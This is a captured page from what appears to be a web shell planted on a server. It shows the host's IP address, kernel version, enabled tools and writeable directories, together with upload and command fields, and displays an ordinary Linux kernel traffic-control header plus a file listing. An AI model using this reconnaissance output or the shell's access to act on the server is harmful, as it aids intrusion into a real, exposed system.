p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.13
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/modules/3.10.0-1160.105.1.el7.x86_64/build/include/net/tc_act/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /usr/lib/modules/3.10.0-1160.105.1.el7.x86_64/build/include/net/tc_act/tc_gact.h
#ifndef __NET_TC_GACT_H
#define __NET_TC_GACT_H

#include <net/act_api.h>
#include <linux/tc_act/tc_gact.h>

struct tcf_gact {
	struct tc_action	common;
#ifdef CONFIG_GACT_PROB
	u16			tcfg_ptype;
	u16			tcfg_pval;
	int			tcfg_paction;
	atomic_t		packets;
#endif
};
#define to_gact(a) ((struct tcf_gact *)a)

static inline bool __is_tcf_gact_act(const struct tc_action *a, int act,
				     bool is_ext)
{
#ifdef CONFIG_NET_CLS_ACT
	struct tcf_gact *gact;

	if (a->ops && a->ops->type != TCA_ACT_GACT)
		return false;

	gact = to_gact(a);
	if ((!is_ext && gact->tcf_action == act) ||
	    (is_ext && TC_ACT_EXT_CMP(gact->tcf_action, act)))
		return true;

#endif
	return false;
}

static inline bool is_tcf_gact_ok(const struct tc_action *a)
{
	return __is_tcf_gact_act(a, TC_ACT_OK, false);
}

static inline bool is_tcf_gact_shot(const struct tc_action *a)
{
	return __is_tcf_gact_act(a, TC_ACT_SHOT, false);
}

static inline bool is_tcf_gact_trap(const struct tc_action *a)
{
	return __is_tcf_gact_act(a, TC_ACT_TRAP, false);
}

static inline bool is_tcf_gact_goto_chain(const struct tc_action *a)
{
	return __is_tcf_gact_act(a, TC_ACT_GOTO_CHAIN, true);
}

static inline u32 tcf_gact_goto_chain_index(const struct tc_action *a)
{
	return READ_ONCE(a->tcfa_action) & TC_ACT_EXT_VAL_MASK;
}

#endif /* __NET_TC_GACT_H */
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
January 19 2024 08:12:51
0 / 0
0755
tc_connmark.h
0.252 KB
November 06 2023 09:15:52
0 / 0
0644
tc_csum.h
0.545 KB
November 06 2023 09:15:52
0 / 0
0644
tc_defact.h
0.233 KB
November 06 2023 09:15:52
0 / 0
0644
tc_gact.h
1.29 KB
November 06 2023 09:15:52
0 / 0
0644
tc_ife.h
1.99 KB
November 06 2023 09:15:52
0 / 0
0644
tc_ipt.h
0.278 KB
November 06 2023 09:15:52
0 / 0
0644
tc_mirred.h
0.922 KB
November 06 2023 09:15:52
0 / 0
0644
tc_nat.h
0.274 KB
November 06 2023 09:15:52
0 / 0
0644
tc_pedit.h
1.418 KB
November 06 2023 09:15:52
0 / 0
0644
tc_sample.h
1.006 KB
November 06 2023 09:15:52
0 / 0
0644
tc_skbedit.h
1.357 KB
November 06 2023 09:15:52
0 / 0
0644
tc_skbmod.h
0.747 KB
November 06 2023 09:15:52
0 / 0
0644
tc_tunnel_key.h
1.801 KB
November 06 2023 09:15:52
0 / 0
0644
tc_vlan.h
1.241 KB
November 06 2023 09:15:52
0 / 0
0644